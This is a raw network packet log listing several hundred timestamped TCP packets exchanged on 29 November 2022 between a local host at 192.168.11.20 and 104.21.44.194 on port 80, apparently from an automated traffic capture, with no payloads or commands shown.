                                                                          Nov 29, 2022 09:20:41.309796095 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309796095 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309798002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309808969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309820890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309832096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309843063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309854031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309864044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309875011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309885979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309941053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309941053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309941053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309941053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309976101 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309987068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309997082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310008049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310019016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310029030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310039997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310050964 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310060978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310071945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310082912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310092926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310103893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310108900 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310108900 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310108900 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310108900 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310108900 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310108900 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310108900 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310110092 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310113907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310125113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310136080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310147047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310220957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310231924 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310242891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310254097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310265064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310276031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310276985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310276985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310276985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310276985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310276985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310276985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310276985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310286999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310297966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310307980 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310318947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310329914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310340881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310501099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310512066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310513973 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310513973 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310513973 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310513973 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310513973 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310523033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310534000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310544968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310555935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310565948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310576916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310587883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310599089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310609102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310614109 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310620070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310631990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310642958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310653925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310663939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310674906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310686111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310731888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310743093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310754061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310765028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310775995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310786963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310791969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310791969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310797930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310808897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310818911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310830116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310841084 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310852051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310863018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310873985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310883999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310894966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310905933 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310916901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310926914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310937881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310954094 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310954094 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.310981035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.310992002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311002016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311012983 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311023951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311034918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311044931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311055899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311067104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311077118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311088085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311099052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311109066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311120033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311130047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311141014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311151981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311161995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311173916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311177015 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311177015 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311224937 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311224937 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311224937 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311237097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311248064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311259031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311269999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311280966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311290979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311301947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311312914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311323881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311335087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311345100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311356068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311367035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311378002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311388016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311395884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311395884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311395884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311395884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311496019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311507940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311517954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311528921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311539888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311549902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311561108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311563969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311563969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311563969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311563969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311563969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311563969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311572075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311583042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311593056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311604023 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311614037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311625004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311635971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311743021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311753988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311760902 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311760902 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311760902 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311760902 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311760902 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311764956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311775923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311786890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311798096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311808109 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311819077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311830044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311841011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311851025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311861992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311872959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311882973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311893940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311909914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311909914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311909914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311909914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311909914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.311988115 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.311999083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312010050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312021017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312031031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312041998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312052965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312062979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312073946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312097073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312097073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312097073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312097073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312247038 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312247038 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312247038 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312247038 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312263966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312274933 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312285900 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312297106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312318087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312330961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312340975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312351942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312362909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312374115 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312385082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312396049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312406063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312417030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312427998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312438965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312448978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312459946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312500954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312511921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312522888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312532902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312544107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312553883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312565088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312575102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312586069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312587023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312587023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312597036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312607050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312618017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312628031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312638998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312649012 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312659979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312669992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312680960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312757969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312757969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312757969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312757969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312758923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312772989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312783957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312794924 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312805891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312815905 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312827110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312838078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312848091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312859058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312869072 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312880039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312891006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312901974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312911987 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312922955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312937021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312947989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313002110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313014030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313024044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313035011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313045979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313056946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313067913 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313079119 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313112020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313112020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313112020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313112020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313112020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313265085 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313265085 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313277006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313287973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313298941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313308954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313319921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313330889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313340902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313352108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313363075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313374043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313385010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313395977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313406944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313417912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313427925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313435078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313435078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313435078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313435078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313435078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313438892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313450098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313461065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313472033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313514948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313525915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313536882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313548088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313558102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313569069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313580036 CET8049852104.21.44.194192.168.11.20
